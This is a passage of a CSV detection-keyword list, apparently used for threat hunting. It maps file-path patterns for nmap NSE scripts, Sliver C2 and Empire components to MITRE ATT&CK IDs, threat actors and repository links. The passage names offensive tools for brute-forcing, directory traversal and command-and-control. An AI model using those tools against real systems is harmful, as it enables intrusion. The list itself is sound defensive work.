tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-axis2-dir-traversal.nse*",".{0,1000}\/http\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-backup-finder.nse*",".{0,1000}\/http\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-barracuda-dir-traversal.nse*",".{0,1000}\/http\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-bigip-cookie.nse*",".{0,1000}\/http\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-brute.nse*",".{0,1000}\/http\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-c2.go*",".{0,1000}\/http\-c2\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/http-cakephp-version.nse*",".{0,1000}\/http\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-chrono.nse*",".{0,1000}\/http\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cisco-anyconnect.nse*",".{0,1000}\/http\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-coldfusion-subzero.nse*",".{0,1000}\/http\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-comments-displayer.nse*",".{0,1000}\/http\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-config-backup.nse*",".{0,1000}\/http\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cookie-flags.nse*",".{0,1000}\/http\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cors.nse*",".{0,1000}\/http\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cross-domain-policy.nse*",".{0,1000}\/http\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-csrf.nse*",".{0,1000}\/http\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-date.nse*",".{0,1000}\/http\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-default-accounts.nse*",".{0,1000}\/http\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-devframework.nse*",".{0,1000}\/http\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-dlink-backdoor.nse*",".{0,1000}\/http\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-dombased-xss.nse*",".{0,1000}\/http\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-domino-enum-passwords.nse*",".{0,1000}\/http\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-drupal-enum.nse*",".{0,1000}\/http\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-drupal-enum-users.nse*",".{0,1000}\/http\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-enum.nse*",".{0,1000}\/http\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-errors.nse*",".{0,1000}\/http\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-exif-spider.nse*",".{0,1000}\/http\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-favicon.nse*",".{0,1000}\/http\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-feed.nse*",".{0,1000}\/http\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-fetch.nse*",".{0,1000}\/http\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-fileupload-exploiter.nse*",".{0,1000}\/http\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-form-brute.nse*",".{0,1000}\/http\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-form-fuzzer.nse*",".{0,1000}\/http\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-frontpage-login.nse*",".{0,1000}\/http\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-generator.nse*",".{0,1000}\/http\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-git.nse*",".{0,1000}\/http\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-gitweb-projects-enum.nse*",".{0,1000}\/http\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-google-malware.nse*",".{0,1000}\/http\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-grep.nse*",".{0,1000}\/http\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-headers.nse*",".{0,1000}\/http\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-hp-ilo-info.nse*",".{0,1000}\/http\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-huawei-hg5xx-vuln.nse*",".{0,1000}\/http\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-icloud-findmyiphone.nse*",".{0,1000}\/http\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-icloud-sendmsg.nse*",".{0,1000}\/http\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-iis-short-name-brute.nse*",".{0,1000}\/http\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-iis-webdav-vuln.nse*",".{0,1000}\/http\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-internal-ip-disclosure.nse*",".{0,1000}\/http\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-joomla-brute.nse*",".{0,1000}\/http\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-jsonp-detection.nse*",".{0,1000}\/http\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-lexmark-version.nse*",".{0,1000}\/http\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/http-lfi.nse*",".{0,1000}\/http\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-litespeed-sourcecode-download.nse*",".{0,1000}\/http\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HTTP-Login.ps1*",".{0,1000}\/HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/http-ls.nse*",".{0,1000}\/http\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-majordomo2-dir-traversal.nse*",".{0,1000}\/http\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-malware-host.nse*",".{0,1000}\/http\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-mcmp.nse*",".{0,1000}\/http\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-methods.nse*",".{0,1000}\/http\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - 